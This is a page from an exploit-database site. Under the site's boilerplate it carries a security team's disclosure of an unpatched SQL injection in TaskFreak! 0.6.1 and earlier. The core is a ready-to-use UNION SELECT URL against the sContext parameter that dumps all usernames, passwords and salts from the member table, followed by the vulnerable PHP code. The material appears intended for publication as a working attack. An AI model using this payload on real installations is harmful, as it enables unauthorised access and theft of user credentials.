0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TaskFreak! <= 0.6.1 Remote SQL Injection Vulnerability
====================================================== TaskFreak! <= 0.6.1 Remote SQL Injection Vulnerability ====================================================== ######################################################################################## ########### _______ __ _____ ___ __ ########### ########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ########### ########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ########### ########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ########### ########### ########### ########### TheDefaced.org ########### ########### TheDefaced Security Team Presents An 0-day. ########### ########### TaskFreak! SQL Injection ########### ######################################################################################## # Product: # # TaskFreak!/Discovered in <==0.6.1 # # # # Vuln: # # Remote SQL Injection # # # # Description: # # The request is not sanitized before it is concatenated to the query. # # # # Patch: # # No Patch # # # # Other: # # # # You must have a login to the script for this to work, # # # # magic_quotes_gpc must be set to Off in the php configuration # # # # URL Form: # # Be sure to change " prefix " sUser " & " sContext " Accordingly! # # # # index.php?sProject=0&id=&mode=save&sort=deadlineDate&dir=1&show=today&sUser=1 # # &sContext=1'+GROUP+BY+1+union+all+select+1,2,3,4,5, # # concat(username,char(58),password,char(58),salt) # # ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+prefix_member/* # # # # # # The following URL will pull and display all usernames passwords and salts from the...# # prefix_member column # # # ######################################################################################## # The following code in the script is vulnerable... # # # # [PHP] # # # # if ($_REQUEST['sContext']) { # # $pContext = $_REQUEST['sContext']; # # $objItemList->addWhere('context = \''.$pContext.'\''); # # $pLink=Tzn::concatUrl($pLink,'sContext='.$pContext); # # } # # [/PHP] # # # # # # # # # ################################################################################################## # 0day.today [2024-11-16] #